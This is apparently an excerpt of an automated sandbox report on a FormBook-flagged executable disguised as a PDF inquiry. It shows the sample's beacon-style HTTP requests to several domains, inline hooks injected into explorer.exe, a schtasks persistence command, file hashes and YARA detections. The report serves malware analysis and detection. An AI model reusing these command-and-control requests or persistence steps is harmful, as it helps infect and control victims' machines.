                                                  Apr 12, 2021 09:43:23.894160032 CEST1127OUTGET /gnk/?Ezr0pl=DnbLuT&sZvD88=H+m5DnQ6CNrLWDhOr9+GU7qZReU4k+N7/cnPpyZ0AIPp8Rivccl87rPwP+687pRYxKR0 HTTP/1.1
                                                  Host: www.hhcuerkn.com
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Apr 12, 2021 09:43:24.183934927 CEST1127INHTTP/1.1 301 Moved Permanently
                                                  Server: nginx/1.16.1
                                                  Date: Mon, 12 Apr 2021 07:43:24 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 169
                                                  Connection: close
                                                  Location: http://loveru.jp/gnk/?Ezr0pl=DnbLuT&sZvD88=H+m5DnQ6CNrLWDhOr9+GU7qZReU4k+N7/cnPpyZ0AIPp8Rivccl87rPwP+687pRYxKR0
                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.16.1</center></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  1192.168.2.449740198.185.159.14480C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Apr 12, 2021 09:43:44.678704023 CEST5247OUTGET /gnk/?sZvD88=SYZO30Rw9/xWTIeSKGPhX7HmTPZweoUXDGzJY+4zU//Zy+/I+iT+Zq6wGsmgWs8tlcqs&Ezr0pl=DnbLuT HTTP/1.1
                                                  Host: www.mobcitylabs.com
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Apr 12, 2021 09:43:44.813931942 CEST5249INHTTP/1.1 400 Bad Request
                                                  Cache-Control: no-cache, must-revalidate
                                                  Content-Length: 77564
                                                  Content-Type: text/html; charset=UTF-8
                                                  Date: Mon, 12 Apr 2021 07:43:44 UTC
                                                  Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                  Pragma: no-cache
                                                  Server: Squarespace
                                                  X-Contextid: kEGnInDp/hKYuFDhP
                                                  Connection: close
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20
                                                  Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em;
                                                  Apr 12, 2021 09:43:44.813957930 CEST5250INData Raw: 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 61 39 61 39 61 39 3b 0a 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 6e 6f 77 72 61 70 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20
                                                  Data Ascii: font-weight: 300; color: #a9a9a9; white-space: nowrap; } footer span strong { font-weight: 300; color: #191919; } @media (max-width: 600px) { body { font-size: 10px; } } @font-face { font-family
                                                  Apr 12, 2021 09:43:44.813977003 CEST5251INData Raw: 5a 63 36 54 67 4b 77 31 43 5a 4c 45 58 79 47 5a 76 49 55 6a 4a 54 46 4c 57 58 69 45 6a 6b 6a 50 2f 45 62 4e 73 72 37 4a 58 55 39 6b 62 54 57 76 76 4e 49 74 64 68 59 66 30 56 70 6a 56 43 35 78 36 41 57 48 30 43 6f 70 4a 39 6b 4c 4c 32 46 4d 6f 34
                                                  Data Ascii: Zc6TgKw1CZLEXyGZvIUjJTFLWXiEjkjP/EbNsr7JXU9kbTWvvNItdhYf0VpjVC5x6AWH0CopJ9kLL2FMo41uoZFFIwX0vyHuEjHYH2VmrxOkqFo0adgxDecFou4ep9oyEd/DYGc3ZB+z+7LZeRzLqapLukxRFwknNZLe1mD3UUryptN0i8agj3nXEkMT3jM6TFgFmSPui9ANP5tgumW+7GL2HT49v6T21zEFSmU/PyRmlIHkbMt
                                                  Apr 12, 2021 09:43:44.813988924 CEST5252INData Raw: 41 62 54 6a 45 6d 75 66 55 51 6f 51 67 41 37 52 69 72 39 61 39 68 5a 78 71 47 69 48 63 52 46 7a 33 71 43 59 53 35 6f 69 36 56 6e 58 56 63 2b 31 6a 6f 48 35 33 57 4c 6c 77 6a 39 5a 58 78 72 33 37 75 63 66 65 38 35 4b 59 62 53 5a 45 6e 4e 50 71 75
                                                  Data Ascii: AbTjEmufUQoQgA7Rir9a9hZxqGiHcRFz3qCYS5oi6VnXVc+1joH53WLlwj9ZXxr37ucfe85KYbSZEnNPquYQLdZGuGjum67O6vs4pznNN15fYXFdOLuLWXrsKEmCQSfZo21npOsch0vJ4uwm8gxs1rVFd7xXNcYLdHOA8u6Q+yN/ryi71Hun8adEPitdau1oRoJdRdmo7vWKu+0nK470m8D6uPnOKeCe7xMpwlB3s5Szbpd7HP+
                                                  Apr 12, 2021 09:43:44.814007044 CEST5253INData Raw: 64 57 72 56 38 34 7a 76 71 7a 55 70 39 38 37 66 66 4f 71 71 2b 70 6a 34 6c 4d 59 63 71 2b 5a 58 75 5a 73 78 54 49 4d 35 5a 7a 6e 4f 75 49 56 7a 61 6e 45 38 43 58 6a 4f 52 4a 38 38 35 36 67 57 65 63 49 73 37 33 47 34 49 56 61 54 6f 6d 2b 46 64 5a
                                                  Data Ascii: dWrV84zvqzUp987ffOqq+pj4lMYcq+ZXuZsxTIM5ZznOuIVzanE8CXjORJ8856gWecIs73G4IVaTom+FdZmk13iQhZpVvwWaeJJvZwmZfgLrMEPDsmWSeTP2pgBIVqr44ljnDOc42NDfmKJscRnzjslLu8YD7DeUiQta8q+gTM8UuJgxqs1ltlxGmF3mHRe8w7M6YKbpYWBIZw6abAXoINXCHv8WIYdhau8bWC2V991qxUKLIeS
                                                  Apr 12, 2021 09:43:44.814023972 CEST5254INData Raw: 73 55 74 73 78 4c 45 35 68 38 53 70 70 4e 4d 66 78 35 69 6a 57 48 70 62 33 6d 5a 31 45 36 68 46 5a 43 4f 74 4a 6d 38 39 4a 38 42 6e 78 37 48 39 43 4d 66 7a 59 41 58 4d 37 66 6d 78 47 73 68 77 4c 6a 56 68 6f 78 30 49 4c 46 71 72 77 35 2b 64 6f 7a
                                                  Data Ascii: sUtsxLE5h8SppNMfx5ijWHpb3mZ1E6hFZCOtJm89J8Bnx7H9CMfzYAXM7fmxGshwLjVhox0ILFqrw5+doz1Kt5lGsvahyjMuRVHINKIASaMX6Aaz/zP39dVJaibMTznE8XEmMq8H7zHPYm8ZeF/aKMDTB0O12KY6trbCV4ekxPC26HLAH2M1LTSQ0hyP1ROTBMgNLCwxVMHS4fHg2e2RNqvGnJI340EzbSTZWms3Y345WE1qeFI
                                                  Apr 12, 2021 09:43:44.814052105 CEST5256INData Raw: 6a 66 69 63 35 33 53 6e 75 34 72 53 74 2b 48 74 59 6a 2b 4a 76 41 47 4a 49 64 55 67 7a 75 6b 70 63 44 65 4a 72 47 31 62 6d 34 57 73 62 6c 75 59 78 4f 77 31 62 47 7a 77 4c 30 44 74 4c 41 71 42 6c 41 74 30 35 36 4c 61 6a 65 7a 71 36 48 72 5a 50 77
                                                  Data Ascii: jfic53Snu4rSt+HtYj+JvAGJIdUgzukpcDeJrG1bm4WsbluYxOw1bGzwL0DtLAqBlAt056Lajezq6HrZPw/M09kfgGcfzBOwryRaVDs6DJQcm6Z8PXsbsd4goAUYk4XLU6HLUiC2fVyfFCeYUc9OUuGlK7uaNENPDxPKgKHrPYD2KRgA0Jz1pdYiVah3ihI8SsbuZ7Qut7FtdT28OepdJALQ9kcuIqJaIlksKpGWQaBJEs5Ro2u
                                                  Apr 12, 2021 09:43:44.814085007 CEST5257INData Raw: 49 73 56 6e 48 51 76 47 66 48 4a 59 2b 47 73 46 4f 76 65 49 61 4c 6b 5a 54 6f 6d 2b 43 35 70 6e 6e 30 5a 74 5a 4f 73 63 53 62 64 54 51 5a 49 5a 49 6a 7a 4e 47 71 33 6a 5a 65 59 56 58 71 62 44 42 4b 37 7a 4f 50 76 37 4e 6d 78 7a 6d 4d 43 6f 36 79
                                                  Data Ascii: IsVnHQvGfHJY+GsFOveIaLkZTom+C5pnn0ZtZOscSbdTQZIZIjzNGq3jZeYVXqbDBK7zOPv7NmxzmMCo6yxGOpqJLxQEPP8ebkh2xjxPso8Vpyed4bWtGDod5nbfYx2tE9IjIcwqDOQxCLgjqhrjJapxQj5aykZ/KjJyp8vYw2jOkioWHg6QaitbobouivfRYdGlwB0//RiIvIqLJ/al9rsfi5oavS3VijivkmceYKJ2jlOzsy3
                                                  Apr 12, 2021 09:43:44.814115047 CEST5258INData Raw: 62 61 4b 64 68 59 6b 30 71 76 4f 51 56 49 71 79 6b 70 38 72 73 6c 57 4b 4b 62 77 45 6d 55 72 39 49 52 64 38 6c 67 73 49 66 2b 75 77 66 68 39 72 73 6a 2f 2f 30 34 7a 38 50 49 39 68 69 6d 33 61 35 51 30 68 41 67 43 76 57 73 45 6c 37 48 4c 47 6b 53
                                                  Data Ascii: baKdhYk0qvOQVIqykp8rslWKKbwEmUr9IRd8lgsIf+uwfh9rsj//04z8PI9him3a5Q0hAgCvWsEl7HLGkSm8xy74a7RIq2RyhLLq4vENxWg6Z8OdDn9k/pO8nvZ82B9HQH4suep5bgnoW/t4r+OSsr3KDZZ7hjnjRmpSwWGJ1Rz24Sgbupfrusw+nYg9brZp6vKv2bXV9yNo3FwRf1UmbhULadGRmefHVN7jCO1g05Yzd4bBIOY
                                                  Apr 12, 2021 09:43:44.814181089 CEST5260INData Raw: 50 33 55 43 44 61 59 67 2f 34 41 2f 4a 38 2b 65 6d 71 41 74 30 47 53 57 39 51 6d 2b 6b 37 6b 35 75 59 62 72 75 30 61 4e 30 4a 59 59 52 78 4a 2b 54 49 52 2b 6e 4c 46 4d 64 4f 39 39 63 4f 75 69 69 68 38 46 49 79 73 53 4d 78 4b 7a 59 77 45 59 32 73
                                                  Data Ascii: P3UCDaYg/4A/J8+emqAt0GSW9Qm+k7k5uYbru0aN0JYYRxJ+TIR+nLFMdO99cOuiih8FIysSMxKzYwEY2sYWtbOMEdrKbPexlHwd4Hi/ghbyIF/MSXuoOf52DHIoeT/J0/wJ3SqRpQnpexxt4N+/hvbyP9ztH3+MHTs4d3Mnd3MuDPMpjQmmVVVe7pmpu5KHLiejRfHs+PruYnKemd+nbnlzBbpT+/sSSBYiT///ekfH78UPEBW
                                                  Apr 12, 2021 09:43:44.946779966 CEST5261INData Raw: 39 79 46 49 39 70 49 64 59 71 59 66 31 4d 41 4e 36 52 49 2b 77 53 49 2f 71 55 5a 5a 48 77 6a 6f 6a 59 54 73 6a 59 66 6d 34 36 56 4d 69 5a 79 64 45 7a 72 5a 48 7a 71 5a 46 7a 72 5a 46 7a 6e 5a 45 7a 72 4b 52 73 33 7a 6b 72 44 74 79 6c 6f 75 63 37
                                                  Data Ascii: 9yFI9pIdYqYf1MAN6RI+wSI/qUZZHwjojYTsjYfm46VMiZydEzrZHzqZFzrZFznZEzrKRs3zkrDtylouc7Y6c5SNn2chZLr75MySMUDeDNMxk2kyDdtPEJJOKxLSMvRjTTD7cnRbuTgp3m8OV6eHKjHBlZrgyK1yZHa7MCVfmhivzwpWOcKUzXOkKV7rDlZ5wpTdc6QtX+sOVgfBjOPwohx9Tw4/28CMXfmTCj9bwoxZ+JOFHMf


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  2192.168.2.449745104.21.82.5880C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Apr 12, 2021 09:44:05.136970043 CEST5340OUTGET /gnk/?Ezr0pl=DnbLuT&sZvD88=xQkMVUIjVgEDTyCEhmabftVVaeWVPbzi+0a4N1BcO5prH32uPLxq/R2onmpvBIdlFaM0 HTTP/1.1
                                                  Host: www.xinghai-nb.com
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Apr 12, 2021 09:44:05.511739969 CEST5342INHTTP/1.1 200 OK
                                                  Date: Mon, 12 Apr 2021 07:44:05 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Set-Cookie: __cfduid=d72ec4b3964b294bd555efaced376efd01618213445; expires=Wed, 12-May-21 07:44:05 GMT; path=/; domain=.xinghai-nb.com; HttpOnly; SameSite=Lax
                                                  Vary: Accept-Encoding
                                                  X-Powered-By: PHP/7.0.19
                                                  CF-Cache-Status: DYNAMIC
                                                  cf-request-id: 0966a2b631000017529682e000000001
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=bL4emAZmoLNoh%2F3y5WI9QpI6yOiIcN7xVH9SrzyE6GhNjo6VNig%2BM45zGnZLTIAGb0FPWEmdMWFC37FFas0RU7FLM%2F7C5Hq4GzvkrBsrszU8ZOE%3D"}],"max_age":604800,"group":"cf-nel"}
                                                  NEL: {"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 63ead3d04ee51752-FRA
                                                  alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                  Data Raw: 31 37 62 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 36 34 30 2c 74 61 72 67 65 74 2d 64 65 6e 73 69 74 79 64 70 69 3d 33 32 30 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0d 0a 3c 74 69 74 6c 65 3e e7 8b bc e4 ba ba 41 56 2c e7 8b bc e4 ba ba 41 50 50 2c e7 8b bc e4 ba ba e5 9c a8 e7 ba bf e8 a7 86 e9 a2 91 2c e7 8b bc e4 ba ba e8 bf 85 e9 9b b7 e4 b8 8b e8 bd bd 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 e7 8b bc e4 ba ba 41 56 2c e7 8b bc e4 ba ba 41 50 50 2c e7 8b bc e4 ba ba e5 9c a8 e7 ba bf e8 a7 86 e9 a2 91 2c e7 8b bc e4 ba ba e8 bf 85 e9 9b b7 e4 b8 8b e8 bd bd 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 e7 8b bc e5 8f 8b e8 a7 86 e9 a2 91 ef bc 88 78 69 6e 67 68 61 69 2d 6e 62 2e 63 6f 6d ef bc 89 e6 94 be e8 bf 87 e6 88 91 2e 2e 2e 2e 2e 2e e4 b8 8d e8 a6 81 2e 2e 2e 2e 2e 2e e7 8b bc e4 ba ba 41 56 2c e7 8b bc e4 ba ba 41 50 50 2c e7 8b bc e4 ba ba e5 9c a8 e7 ba bf e8 a7 86 e9 a2 91 2c e7 8b bc e4 ba ba e8 bf 85 e9 9b b7 e4 b8 8b e8 bd bd e6 ad a3 e5 9c a8 e6 92 ad e6 94 be 2e 2e 2e 2e 2e 2e e5 93 a5 e5 93 a5 2e 2e 2e 2e 2e 2e e4 bc 9a e5 9d 8f e6 8e 89 2e 2e 2e
                                                  Data Ascii: 17b5<!DOCTYPE html><html><head><meta charset="utf-8"><meta name="viewport" content="width=640,target-densitydpi=320,user-scalable=no"><title>AV,APP,,</title><meta name="keywords" content="AV,APP,,"><meta name="description" content="xinghai-nb.com............AV,APP,,...............
                                                  Apr 12, 2021 09:44:05.511765957 CEST5343INData Raw: 2e 2e 2e e4 bd a0 e8 bf 9b e6 9d a5 e5 90 a7 2e 2e 2e 2e 2e 2e e4 bd a0 e5 a5 bd e5 a4 a7 2e 2e 2e 2e 2e 2e e8 a6 81 e5 87 ba e6 9d a5 e4 ba 86 2e 2e 2e 2e 2e 2e e6 88 91 e8 a6 81 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68
                                                  Data Ascii: ....................."><link rel="stylesheet" type="text/css" href="sj/css/common.css"><link rel="shortcut icon" type="image/x-icon" href="sj/img/favicon.ico"><style type="text/css">*{padding: 0;m
                                                  Apr 12, 2021 09:44:05.511779070 CEST5344INData Raw: 30 70 78 3b 7d 2e 78 69 61 6e 6c 75 20 73 70 61 6e 7b 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 6c 69 6e 65 2d 68 65
                                                  Data Ascii: 0px;}.xianlu span{display: inline-block;vertical-align: middle;color: #fff;line-height: 2.55rem;font-size: 1.6rem;}.xianlu span.copybtn{padding: 0 .5rem;background: #b214a1;border-radius: 3rem;}.jinru{padding: 0 .5rem;background: #b214a1;borde
                                                  Apr 12, 2021 09:44:05.511795044 CEST5346INData Raw: 46 46 46 46 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 7d 2e 79 6f 75 6c 69 61 6e 61 61 7b 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 7d 2e 79 6f 75 6c
                                                  Data Ascii: FFFF;font-size: 20px;}.youlianaa{display: flex;font-size: 20px;color: white;}.youlianaa a{margin: 0 20px 0 10px;font-size: 20px;color: white;}.youlianaa a:hover{color: red;}@media screen and (max-width:750px){.soft-name{margin-right: 210px !im
                                                  Apr 12, 2021 09:44:05.511806965 CEST5347INData Raw: 3c 2f 64 69 76 3e 0d 0a 09 09 20 20 20 20 20 20 20 20 0d 0a 09 09 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 09 09 09 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 6e 74 22 3e 0d 0a 09 09 09 09 3c 69 6d 67 20 63 6c 61 73 73 3d 22 6c
                                                  Data Ascii: </div> </div><div class="centent"><img class="logo" src="sj/img/xc.jpg" alt=""><h1 class="app_name"><br></h1><p class="tiptip"></p><p class="descrip
                                                  Apr 12, 2021 09:44:05.511820078 CEST5347INData Raw: 6a 71 75 65 72 79 2d 33 2e 31 2e 31 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69
                                                  Data Ascii: jquery-3.1.1.min.js" type="text/javascript"></script><script type="text/javascript">function hide() { dom.style.display = "none"}</script><script rel="nofollow" src="/js/tj.js"></script></body></html>
                                                  Apr 12, 2021 09:44:05.511832952 CEST5348INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Code Manipulations

                                                  User Modules

                                                  Hook Summary

                                                  Function NameHook TypeActive in Processes
                                                  PeekMessageAINLINEexplorer.exe
                                                  PeekMessageWINLINEexplorer.exe
                                                  GetMessageWINLINEexplorer.exe
                                                  GetMessageAINLINEexplorer.exe

                                                  Processes

                                                  Process: explorer.exe, Module: user32.dll
                                                  Function NameHook TypeNew Data
                                                  PeekMessageAINLINE0x48 0x8B 0xB8 0x88 0x8E 0xE3
                                                  PeekMessageWINLINE0x48 0x8B 0xB8 0x80 0x0E 0xE3
                                                  GetMessageWINLINE0x48 0x8B 0xB8 0x80 0x0E 0xE3
                                                  GetMessageAINLINE0x48 0x8B 0xB8 0x88 0x8E 0xE3

                                                  Statistics

                                                  CPU Usage

                                                  Click to jump to process

                                                  Memory Usage

                                                  Click to jump to process

                                                  High Level Behavior Distribution

                                                  Click to dive into process behavior distribution

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  Analysis Process: INQUIRY 1820521 pdf.exe PID: 6928 Parent PID: 6004

                                                  General

                                                  Start time:09:42:05
                                                  Start date:12/04/2021
                                                  Path:C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe'
                                                  Imagebase:0xd50000
                                                  File size:859648 bytes
                                                  MD5 hash:DD3AE15E952C239AE6D87C8374B3B460
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.681685603.0000000003579000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.682219673.000000000492C000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.682219673.000000000492C000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.682219673.000000000492C000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:low

                                                  Chronological Activities

                                                  Analysis Process: schtasks.exe PID: 7156 Parent PID: 6928

                                                  General

                                                  Start time:09:42:19
                                                  Start date:12/04/2021
                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\YAhcdYrYHFkNNf' /XML 'C:\Users\user\AppData\Local\Temp\tmp7085.tmp'
                                                  Imagebase:0x250000
                                                  File size:185856 bytes
                                                  MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Chronological Activities

                                                  Analysis Process: conhost.exe PID: 6204 Parent PID: 7156

                                                  General

                                                  Start time:09:42:19
                                                  Start date:12/04/2021
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff724c50000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Chronological Activities

                                                  Analysis Process: INQUIRY 1820521 pdf.exe PID: 2848 Parent PID: 6928

                                                  General

                                                  Start time:09:42:20
                                                  Start date:12/04/2021
                                                  Path:C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe
                                                  Imagebase:0x390000
                                                  File size:859648 bytes
                                                  MD5 hash:DD3AE15E952C239AE6D87C8374B3B460
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low

                                                  Chronological Activities

                                                  Analysis Process: INQUIRY 1820521 pdf.exe PID: 1848 Parent PID: 6928

                                                  General

                                                  Start time:09:42:20
                                                  Start date:12/04/2021
                                                  Path:C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe
                                                  Imagebase:0xa0000
                                                  File size:859648 bytes
                                                  MD5 hash:DD3AE15E952C239AE6D87C8374B3B460
